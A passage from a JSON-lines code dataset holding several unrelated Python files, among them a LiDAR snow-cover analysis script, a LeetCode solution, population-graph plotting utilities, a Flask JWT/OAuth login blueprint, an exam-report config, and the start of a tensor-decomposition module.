len(SnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nUT_NoSnowPixels = len(NoSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nUT_fSCA = 100.*UT_snowPixels/(UT_snowPixels+UT_NoSnowPixels)\n\nOP_snowPixels = len(Snow0penClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nOP_NoSnowPixels = len(NoSnow0penClassVcm_df[['x','y']].drop_duplicates(keep='first'))\nOP_fSCA = 100.*OP_snowPixels/(OP_NoSnowPixels+OP_snowPixels)\n#%% all classification based on topography and northness for under canopy snow\n# s:sheltered; n:neutral; e:exposed; l:low; m:mid; h:high\n# calculation of fSCA for each of 9 catagories and under canopy and in 0pen\nUnTree_el_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nUT_el = len(UnTree_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_el_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nNS_UT_el = len(NS_UnTree_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_el = 100.*(float(UT_el)/(UT_el+NS_UT_el))\n\nUnTree_em_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nUT_em = len(UnTree_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_em_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nNS_UT_em = len(NS_UnTree_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_em = 100.*(float(UT_em)/(UT_em+NS_UT_em))\n\nUnTree_eh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nUT_eh = len(UnTree_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_eh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nNS_UT_eh = len(NS_UnTree_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_eh = 100.*(float(UT_eh)/(UT_eh+NS_UT_eh))\n\nUnTree_nl_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nUT_nl = len(UnTree_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nl_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nNS_UT_nl = len(NS_UnTree_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nl = 100.*(float(UT_nl)/(UT_nl+NS_UT_nl))\n\nUnTree_nm_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nUT_nm = len(UnTree_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nm_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nNS_UT_nm = len(NS_UnTree_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nm = 100.*(float(UT_nm)/(UT_nm+NS_UT_nm))\n\nUnTree_nh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nUT_nh = len(UnTree_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_nh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nNS_UT_nh = len(NS_UnTree_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_nh = 100.*(float(UT_nh)/(UT_nh+NS_UT_nh))\n\nUnTree_sl_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nUT_sl = len(UnTree_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sl_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nNS_UT_sl = len(NS_UnTree_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sl = 100.*(float(UT_sl)/(UT_sl+NS_UT_sl))\n\nUnTree_sm_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nUT_sm = len(UnTree_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sm_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nNS_UT_sm = len(NS_UnTree_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sm = 100.*(float(UT_sm)/(UT_sm+NS_UT_sm))\n\nUnTree_sh_vcm_df = SnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nUT_sh = len(UnTree_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_UnTree_sh_vcm_df = NoSnowUnderTreeClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nNS_UT_sh = len(NS_UnTree_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_ut_sh = 100.*(float(UT_sh)/(UT_sh+NS_UT_sh))\n\n#%% all classification based on topography and northness for 0pen space snow\n#calculation of fSCA for each of 9 catagories for 0pen sites\nOpen_el_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nOp_el = len(Open_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_el_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['el']['Index'].astype(int)].dropna()\nNS_Op_el = len(NS_Open_el_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_el = 100.*(Op_el)/(Op_el+NS_Op_el)\n\nOpen_em_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nOp_em = len(Open_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_em_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['em']['Index'].astype(int)].dropna()\nNS_Op_em = len(NS_Open_em_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_em = 100.*(Op_em)/(Op_em+NS_Op_em)\n\nOpen_eh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nOp_eh = len(Open_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_eh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['eh']['Index'].astype(int)].dropna()\nNS_Op_eh = len(NS_Open_eh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_eh = 100.*(Op_eh)/(Op_eh+NS_Op_eh)\n\nOpen_nl_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nOp_nl = len(Open_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nl_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nl']['Index'].astype(int)].dropna()\nNS_Op_nl = len(NS_Open_nl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nl = 100.*(Op_nl)/(Op_nl+NS_Op_nl)\n\nOpen_nm_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nOp_nm = len(Open_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nm_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nm']['Index'].astype(int)].dropna()\nNS_Op_nm = len(NS_Open_nm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nm = 100.*(Op_nm)/(Op_nm+NS_Op_nm)\n\nOpen_nh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nOp_nh = len(Open_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_nh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['nh']['Index'].astype(int)].dropna()\nNS_Op_nh = len(NS_Open_nh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_nh = 100.*(Op_nh)/(Op_nh+NS_Op_nh)\n\nOpen_sl_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nOp_sl = len(Open_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sl_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sl']['Index'].astype(int)].dropna()\nNS_Op_sl = len(NS_Open_sl_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sl = 100.*(Op_sl)/(Op_sl+NS_Op_sl)\n\nOpen_sm_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nOp_sm = len(Open_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sm_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sm']['Index'].astype(int)].dropna()\nNS_Op_sm = len(NS_Open_sm_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sm = 100.*(Op_sm)/(Op_sm+NS_Op_sm)\n\nOpen_sh_vcm_df = Snow0penClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nOp_sh = len(Open_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nNS_Open_sh_vcm_df = NoSnow0penClassVcm_df.loc[topo_dimension_vcm['sh']['Index'].astype(int)].dropna()\nNS_Op_sh = len(NS_Open_sh_vcm_df[['x','y']].drop_duplicates(keep='first'))\nFSCA_0p_sh = 100.*(Op_sh)/(Op_sh+NS_Op_sh)\n\n#%% ploting\nn_groups = 9\nx11 = ['exp_low_0p','flt_low_0p','shl_low_0p','exp_mid_0p',\n 'flt_mid_0p','shl_mid_0p','exp_hi_0p','flt_hi_0p','shl_hi_0p']\nd11 = [FSCA_0p_el,FSCA_0p_nl,FSCA_0p_sl,FSCA_0p_em,FSCA_0p_nm,FSCA_0p_sm,FSCA_0p_eh,FSCA_0p_nh,FSCA_0p_sh]\n\nx22 = ['exp_low_UT','flt_low_UT','shl_low_UT','exp_mid_UT',\n 'flt_mid_UT','shl_mid_UT','exp_hi_UT','flt_hi_UT','shl_hi_UT']\nd22 = [FSCA_ut_el,FSCA_ut_nl,FSCA_ut_sl,FSCA_ut_em,FSCA_ut_nm,FSCA_ut_sm,FSCA_ut_eh,FSCA_ut_nh,FSCA_ut_sh]\n# create plot\nfig, ax = plt.subplots(figsize=(15,10))\nindex = np.arange(n_groups)\nbar_width = 0.4\nopacity = 0.8\n\nrects1 = plt.bar(index, d11, bar_width,color='snow',edgecolor='tan',label='0pen')\n\nrects2 = plt.bar(index + bar_width, d22, bar_width, color='green',label='underTree')\n\nplt.ylabel('fSCA(%)', fontsize=30)\nplt.yticks(fontsize=20)\n\nplt.xticks(index + bar_width/2.,('exp_low','flt_low','shl_low','exp_mid','flt_mid','shl_mid','exp_hi','flt_hi','shl_hi'), fontsize=20)\n\nplt.title('fSCA% in Sagehen Creek 17April2016; under canopy vs. open, exposed vs. sheltered',fontsize=20)\nplt.legend(fontsize=20)\nplt.savefig('G:/hhs_DST/lidar_analysis/sagehen/fSCA_pixel_sagehen_elev_topo10_noG30A17.png')\n\n\n\n","sub_path":"LiDarAnalysis/sagehen/LiDar_DemBasedClassification_intertuple_indxMthd_sc17A.py","file_name":"LiDar_DemBasedClassification_intertuple_indxMthd_sc17A.py","file_ext":"py","file_size_in_byte":33207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"544316513","text":"#!/usr/bin/python\nimport sys\n\nclass Solution(object):\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n pre = nums[0]\n cnt = 1\n result = 1\n for i in range(1, len(nums)):\n if nums[i] <= pre:\n pre = nums[i]\n result = max(result, cnt)\n cnt = 1\n else:\n pre = nums[i]\n cnt += 1\n result = max(result, cnt)\n return result\n\ndef main():\n aa = Solution()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"LeetCode/longestContinuousIncreasingSubsequence.py","file_name":"longestContinuousIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344050598","text":"import demes\nimport numpy as np\n\n\ndef inf_start_time(graph: demes.Graph, inf_ratio: float, log_scale: bool) -> float:\n \"\"\"\n Calculate the value on the time axis that will be used instead of infinity.\n\n :param float inf_ratio:\n :param bool log_scale: The time axis uses a log scale.\n :return: The time\n :rtype: float\n \"\"\"\n epoch0_times = []\n for deme in graph.demes:\n epoch0_times.append(deme.epochs[0].end_time)\n if not np.isinf(deme.epochs[0].start_time):\n epoch0_times.append(deme.epochs[0].start_time)\n oldest_noninf_time = max(epoch0_times)\n if oldest_noninf_time == 0:\n # All demes are root demes and have a constant size.\n # About 100 generations is a nice time scale to draw, and we use 113\n # specifically so that the infinity line extends slightly beyond the\n # last tick mark that matplotlib autogenerates.\n inf_start_time: float = 113\n else:\n if log_scale:\n inf_start_time = np.exp(np.log(oldest_noninf_time) / (1 - inf_ratio))\n else:\n inf_start_time = oldest_noninf_time / (1 - inf_ratio)\n return inf_start_time\n\n\ndef size_of_deme_at_time(deme: demes.Deme, time: float) -> float:\n \"\"\"\n Return the population size of the deme at the given time.\n \"\"\"\n for epoch in deme.epochs:\n if epoch.start_time >= time >= epoch.end_time:\n break\n else:\n raise ValueError(f\"deme {deme.id} doesn't exist at time {time}\")\n\n if np.isclose(time, epoch.end_time) or epoch.start_size == epoch.end_size:\n N = epoch.end_size\n else:\n assert epoch.size_function == \"exponential\"\n dt = (epoch.start_time - time) / epoch.time_span\n r = np.log(epoch.end_size / epoch.start_size)\n N = epoch.start_size * np.exp(r * dt)\n return N\n","sub_path":"demesdraw/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266858127","text":"from datetime import datetime, timedelta\nimport os\nimport jwt\nimport json\nimport requests\nfrom functools import wraps\nfrom urlparse import parse_qs, parse_qsl\nfrom urllib import urlencode\nfrom flask import Flask, g, send_file, request, redirect, url_for, jsonify, render_template\nfrom flask import current_app\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom requests_oauthlib import OAuth1\nfrom jwt import DecodeError, ExpiredSignature\nfrom cabildear.config import TOKEN_SECRET\nfrom ..decorators import login_required\n\n# Configuration\n\ncurrent_path = os.path.dirname(__file__)\nclient_path = os.path.abspath(os.path.join(current_path, 'cabildear', 'static'))\n\n\nfrom flask import Blueprint\n\nauth = Blueprint('auth', __name__)\n\nfrom cabildear import db\nfrom ..models import User\n\ndef create_token(user):\n payload = {\n 'sub': user.id,\n 'iat': datetime.utcnow(),\n 'exp': datetime.utcnow() + timedelta(days=14)\n }\n token = jwt.encode(payload, TOKEN_SECRET)\n return token.decode('unicode_escape')\n\n\ndef parse_token(req):\n token = req.headers.get('Authorization').split()[1]\n return jwt.decode(token, TOKEN_SECRET)\n\n\n\n# Routes\n\n\n@auth.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n\n@auth.route('/api/me')\n@login_required\ndef me():\n user = User.query.filter_by(id=g.user_id).first()\n return jsonify(user.to_json())\n\n\n@auth.route('/auth/login', methods=['POST'])\ndef login():\n user = User.query.filter_by(email=request.json['email']).first()\n if not user or not user.check_password(request.json['password']):\n response = jsonify(message='Wrong Email or Password')\n response.status_code = 401\n return response\n token = create_token(user)\n return jsonify(token=token)\n\n\n@auth.route('/auth/signup', methods=['POST'])\ndef signup():\n user = User(email=request.json['email'], password=request.json['password'])\n db.session.add(user)\n db.session.commit()\n token = create_token(user)\n return jsonify(token=token)\n\n\n@auth.route('/auth/facebook', methods=['POST'])\ndef facebook():\n access_token_url = 'https://graph.facebook.com/v2.3/oauth/access_token'\n graph_api_url = 'https://graph.facebook.com/v2.3/me'\n\n params = {\n 'client_id': request.json['clientId'],\n 'redirect_uri': request.json['redirectUri'],\n 'client_secret': app.config['FACEBOOK_SECRET'],\n 'code': request.json['code']\n }\n\n # Step 1. Exchange authorization code for access token.\n r = requests.get(access_token_url, params=params)\n access_token = dict(parse_qsl(r.text))\n\n # Step 2. Retrieve information about the current user.\n r = requests.get(graph_api_url, params=access_token)\n profile = json.loads(r.text)\n\n # Step 3. (optional) Link accounts.\n if request.headers.get('Authorization'):\n user = User.query.filter_by(facebook=profile['id']).first()\n if user:\n response = jsonify(message='There is already a Facebook account that belongs to you')\n response.status_code = 409\n return response\n\n payload = parse_token(request)\n\n user = User.query.filter_by(id=payload['sub']).first()\n if not user:\n response = jsonify(message='User not found')\n response.status_code = 400\n return response\n\n u = User(facebook=profile['id'], display_name=profile['name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n # Step 4. Create a new account or return an existing one.\n user = User.query.filter_by(facebook=profile['id']).first()\n if user:\n token = create_token(user)\n return jsonify(token=token)\n\n u = User(facebook=profile['id'], display_name=profile['name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n@auth.route('/auth/github', methods=['POST'])\ndef github():\n access_token_url = 'https://github.com/login/oauth/access_token'\n users_api_url = 'https://api.github.com/user'\n\n params = {\n 'client_id': request.json['clientId'],\n 'redirect_uri': request.json['redirectUri'],\n 'client_secret': current_app.config['GITHUB_SECRET'],\n 'code': request.json['code']\n }\n\n # Step 1. Exchange authorization code for access token.\n r = requests.get(access_token_url, params=params)\n access_token = dict(parse_qsl(r.text))\n headers = {'User-Agent': 'Satellizer'}\n\n # Step 2. Retrieve information about the current user.\n r = requests.get(users_api_url, params=access_token, headers=headers)\n profile = json.loads(r.text)\n\n # Step 3. (optional) Link accounts.\n if request.headers.get('Authorization'):\n user = User.query.filter_by(github=profile['id']).first()\n if user:\n response = jsonify(message='There is already a GitHub account that belongs to you')\n response.status_code = 409\n return response\n\n payload = parse_token(request)\n\n user = User.query.filter_by(id=payload['sub']).first()\n if not user:\n response = jsonify(message='User not found')\n response.status_code = 400\n return response\n\n u = User(github=profile['id'], display_name=profile['name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n # Step 4. Create a new account or return an existing one.\n user = User.query.filter_by(github=str(profile['id'])).first()\n if user:\n token = create_token(user)\n return jsonify(token=token)\n\n u = User(github=str(profile['id']), display_name=profile['name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n\n\n@auth.route('/auth/google', methods=['POST'])\ndef google():\n access_token_url = 'https://accounts.google.com/o/oauth2/token'\n people_api_url = 'https://www.googleapis.com/plus/v1/people/me/openIdConnect'\n\n payload = dict(client_id=request.json['clientId'],\n redirect_uri=request.json['redirectUri'],\n client_secret=app.config['GOOGLE_SECRET'],\n code=request.json['code'],\n grant_type='authorization_code')\n\n # Step 1. Exchange authorization code for access token.\n r = requests.post(access_token_url, data=payload)\n token = json.loads(r.text)\n headers = {'Authorization': 'Bearer {0}'.format(token['access_token'])}\n\n # Step 2. Retrieve information about the current user.\n r = requests.get(people_api_url, headers=headers)\n profile = json.loads(r.text)\n\n user = User.query.filter_by(google=profile['sub']).first()\n if user:\n token = create_token(user)\n return jsonify(token=token)\n u = User(google=profile['sub'],\n display_name=profile['name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n\n@auth.route('/auth/linkedin', methods=['POST'])\ndef linkedin():\n access_token_url = 'https://www.linkedin.com/uas/oauth2/accessToken'\n people_api_url = 'https://api.linkedin.com/v1/people/~:(id,first-name,last-name,email-address)'\n\n payload = dict(client_id=request.json['clientId'],\n redirect_uri=request.json['redirectUri'],\n client_secret=app.config['LINKEDIN_SECRET'],\n code=request.json['code'],\n grant_type='authorization_code')\n\n # Step 1. Exchange authorization code for access token.\n r = requests.post(access_token_url, data=payload)\n access_token = json.loads(r.text)\n params = dict(oauth2_access_token=access_token['access_token'],\n format='json')\n\n # Step 2. Retrieve information about the current user.\n r = requests.get(people_api_url, params=params)\n profile = json.loads(r.text)\n\n user = User.query.filter_by(linkedin=profile['id']).first()\n if user:\n token = create_token(user)\n return jsonify(token=token)\n u = User(linkedin=profile['id'],\n display_name=profile['firstName'] + ' ' + profile['lastName'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n\n\n@auth.route('/auth/twitter', methods=['POST'])\ndef twitter():\n request_token_url = 'https://api.twitter.com/oauth/request_token'\n access_token_url = 'https://api.twitter.com/oauth/access_token'\n\n if request.json.get('oauth_token') and request.json.get('oauth_verifier'):\n auth = OAuth1(current_app.config['TWITTER_CONSUMER_KEY'],\n client_secret=current_app.config['TWITTER_CONSUMER_SECRET'],\n resource_owner_key=request.json.get('oauth_token'),\n verifier=request.json.get('oauth_verifier'))\n r = requests.post(access_token_url, auth=auth)\n profile = dict(parse_qsl(r.text))\n\n user = User.query.filter_by(twitter=profile['user_id']).first()\n if user:\n token = create_token(user)\n return jsonify(token=token)\n u = User(twitter=profile['user_id'],\n display_name=profile['screen_name'])\n db.session.add(u)\n db.session.commit()\n token = create_token(u)\n return jsonify(token=token)\n else:\n oauth = OAuth1(current_app.config['TWITTER_CONSUMER_KEY'],\n client_secret=current_app.config['TWITTER_CONSUMER_SECRET'],\n callback_uri=current_app.config['TWITTER_CALLBACK_URL'])\n r = requests.post(request_token_url, auth=oauth)\n oauth_token = dict(parse_qsl(r.text))\n return jsonify(oauth_token)\n","sub_path":"cabildear/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"471627014","text":"AVG_RANK_OF_SUM_SUBJECT = ['类别', '总分', '排名', '语文', '排名', '数学', '排名', '英语', '排名', '物理', '排名', '化学', '排名']\nAVG_OF_SUM_SUBJECT = ['科目(平均分)', '总分', '语文', '数学', '英语', '物理', '化学']\nNUM_OF_SUBJECT = ['类别(人数)', '语文', '数学', '英语', '物理', '化学']\nLINE_OF_25_60_85 = ['学校', \"前25%人数\", \"前60%人数\", \"前85人数\"]\nAVG_RANK_OF_SUM_SUBJECT_CLASS = ['学校', '班级', '总分', '排名', '语文', '排名', '数学', '排名', '英语', '排名', '物理', '排名', '化学', '排名', ]\nCLASS_AVG_OF_SUM_SUBJECT = ['科目(类别)', '总分', '语文', '数学', '英语', '物理', '化学']\nSCHOOL_AVG_OF_SUM_SUBJECT = ['科目(类别)', '总分', '语文', '数学', '英语', '物理', '化学']\n\nREAL_TABLE_EXTRA_TITLE = \"(实考)\"\nJUNIOR_TABLE_EXTRA_TITLE = \"(中考)\"\n\nREAL_CHART_EXTRA_TITLE = \"实考\"\nJUNIOR_CHART_EXTRA_TITLE = \"( 参与中考 )\"\n","sub_path":"refactoring/edu/config/first_row_config.py","file_name":"first_row_config.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"169742249","text":"'''\nFUNCTIONS OVERVIEW\nmy_glmnet:\nmy_glmnet_cv:\nbeta_fit:\n\n\nCLASSES OVERVIEW\n\ninitialization: PARAMETER INITIALIZATIONS\nspaco: spaco with outomatic penalty selection.\nspaco_cf: spaco with cross-fit.\nspaco_inf: post selection inference for the spaco or spaco_cf objs.\n'''\n\nimport numpy as np\nimport random\nimport mxnet\nimport copy\nimport pandas as pd\nfrom sklearn.model_selection import KFold\nimport rpy2\nimport rpy2.robjects as robjects\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects import pandas2ri\nimport tensorly as tl\nfrom tensorly.decomposition import parafac\nfrom .helpers import penalty_search, prepare, unfold, FPCA_smooth, Uconstruct\nimport scipy\nfrom rpy2.robjects import r\nimport torch\nimport os\nimport tensorflow as tf\n\nas_null = r['as.null']\npandas2ri.activate()\nstats = importr('stats')\nbase = importr('base')\nglmnet_package = importr('glmnet')\nglmnet = glmnet_package.glmnet\ncv_glmnet = glmnet_package.cv_glmnet\n\ndef seed_everything(seed=2021):\n \"\"\"\"\n Seed everything.\n \"\"\"\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n mxnet.random.seed(seed)\n tf.random.set_seed(seed)\n\ndef my_glmnet(x, y, lam, nlam, penalty_factor):\n fitted = glmnet(x=x, y= y.reshape(len(y),1), family = \"gaussian\",\n intercept=False, nlambda=nlam, penalty_factor=penalty_factor)\n coefficients0 = stats.coef(fitted, s=lam)\n coefficients0 = robjects.r['summary'](coefficients0)\n coefficients0 = np.array(coefficients0)\n coefficients = np.zeros((x.shape[1]))\n for j in np.arange(coefficients0.shape[0]):\n coefficients[int(coefficients0[j, 0]) - 2] = coefficients0[j, 2]\n return coefficients\n\n\ndef my_cv_glmnet(x, y,penalty_factor, nlam, nfolds, foldid = None):\n if foldid is None:\n foldid = as_null()\n fitted = cv_glmnet(x=x, y= y.reshape(len(y),1), intercept=False,\n nfolds=nfolds, foldid = foldid, nlambda=nlam,\n penalty_factor=penalty_factor)\n coefficients0 = stats.coef(fitted, s=\"lambda.min\")\n extracted = tuple(fitted)\n lambdas = extracted[0]\n cvm = extracted[1]\n cvsd = extracted[2]\n coefficients0 = robjects.r['summary'](coefficients0)\n coefficients0 = np.array(coefficients0)\n coefficients = np.zeros((x.shape[1]))\n idx0 = np.argmin(cvm)\n lambda1min = lambdas[idx0]\n for j in np.arange(coefficients0.shape[0]):\n coefficients[int(coefficients0[j, 0]) - 2] = coefficients0[j, 2]\n return coefficients, lambda1min, cvm, cvsd, lambdas\n\ndef beta_fit(Z, transform_mat, transform_vec, beta,intercepts,lambda2, fit_intercept = True,\n lam2_update = True, nlam2 = 100, nfolds = 5, foldid = as_null(),max_iter = 1, tol = 0.01):\n augZ = Z.copy()\n err = 2.0 * tol\n it = 0\n beta_prev = beta.copy()\n intercepts_prev = intercepts.copy()\n K = transform_vec.shape[1]\n while it < max_iter and err > tol:\n if fit_intercept is True:\n augZ = np.hstack([Z, np.ones((Z.shape[0], 1), dtype=float)])\n for k in np.arange(K):\n mu_trans = np.zeros(Z.shape[0])\n Z_trans = np.zeros(augZ.shape)\n bb = np.delete(beta_prev, k, axis=1)\n tmp0 = np.matmul(Z, bb)\n if fit_intercept:\n tmp0 = tmp0 + np.delete(intercepts_prev, k)\n for i in np.arange(Z.shape[0]):\n tmp = transform_mat[i, k, :]\n tmp = np.delete(tmp, k)\n # transform_mat[i,:,:] ~ Lambda_f - Lambda_f Sigma[i,:,:] Lambda_f\n # transform_vec[i,:] = Lambda_f Sigma[i,:,:] PhiV^T Lambda_i XI[:,i]\n # mu_trans[i]=1/np.sqrt(transform_mat[i,:,:]) *(transform_vec[i,k]+sum(Sigam[k,k^c]*tmp0/(s2[k^c]*s2[k])))\n # note that transform_mat[i,k,k^c] = -cov[i,k,k^c]/(s2[k^c]s2[k]), hence version 0 is correct\n mu_trans[i] = (transform_vec[i, k] - np.sum(tmp0[i, :] * tmp))/np.sqrt(transform_mat[i, k, k])\n Z_trans[i, :] = augZ[i, :] * np.sqrt(transform_mat[i, k, k])\n penalty_factor = np.ones(Z_trans.shape[1])\n if fit_intercept:\n penalty_factor[Z_trans.shape[1] - 1] = 0.0\n if lam2_update:\n coefficients, lambda1min, cvm, cvsd, lambdas = my_cv_glmnet(x=Z_trans, y=mu_trans,\n penalty_factor=penalty_factor, nlam= nlam2, nfolds=nfolds, foldid = foldid)\n lambda2[k] = lambda1min\n else:\n coefficients = my_glmnet(x=Z_trans, y=mu_trans, lam=lambda2[k], nlam=100, penalty_factor=penalty_factor)\n p0 = len(coefficients)\n if fit_intercept:\n intercepts[k] = coefficients[p0 - 1]\n p0 = p0 - 1\n beta[:, k] = coefficients[:p0].copy()\n err = np.sum((beta - beta_prev)**2)\n it += 1\n beta_prev = beta.copy()\n intercepts_prev = intercepts.copy()\n return beta, intercepts, lambda2\n\n\nclass initialization():\n def __init__(self, X, OBS, T0, Xmodes = None, OBSmodes = None, K = 1, mod = \"pca\", homoNoise = True,\n vNorm = 1, phiNorm = 1, jen_num = 10, random_num = 10, h = None, eps = 1e-10,\n random_state = 0):\n self.X = X\n self.O = OBS\n self.T0 = T0\n self.K = K\n self.mod = mod\n self.homoNoise = homoNoise\n self.vNorm = vNorm\n self.phiNorm = phiNorm\n self.random_num = random_num\n self.jen_num = jen_num\n self.Xmodes = Xmodes\n self.Omodes = OBSmodes\n self.sigma2 = np.ones(X.shape[2])\n self.s2 = np.ones(self.K)\n self.random_state = random_state\n if self.Xmodes is None or self.Xmodes is None:\n self.Xmodes = {}\n self.Omodes = {}\n self.Xmodes['X1'],self.Omodes['O1'], self.Xmodes['X2'],self.Omodes['O2'], \\\n self.Xmodes['X3'],self.Omodes['O3'] = unfold(self.X, self.O)\n self.V0 = None\n 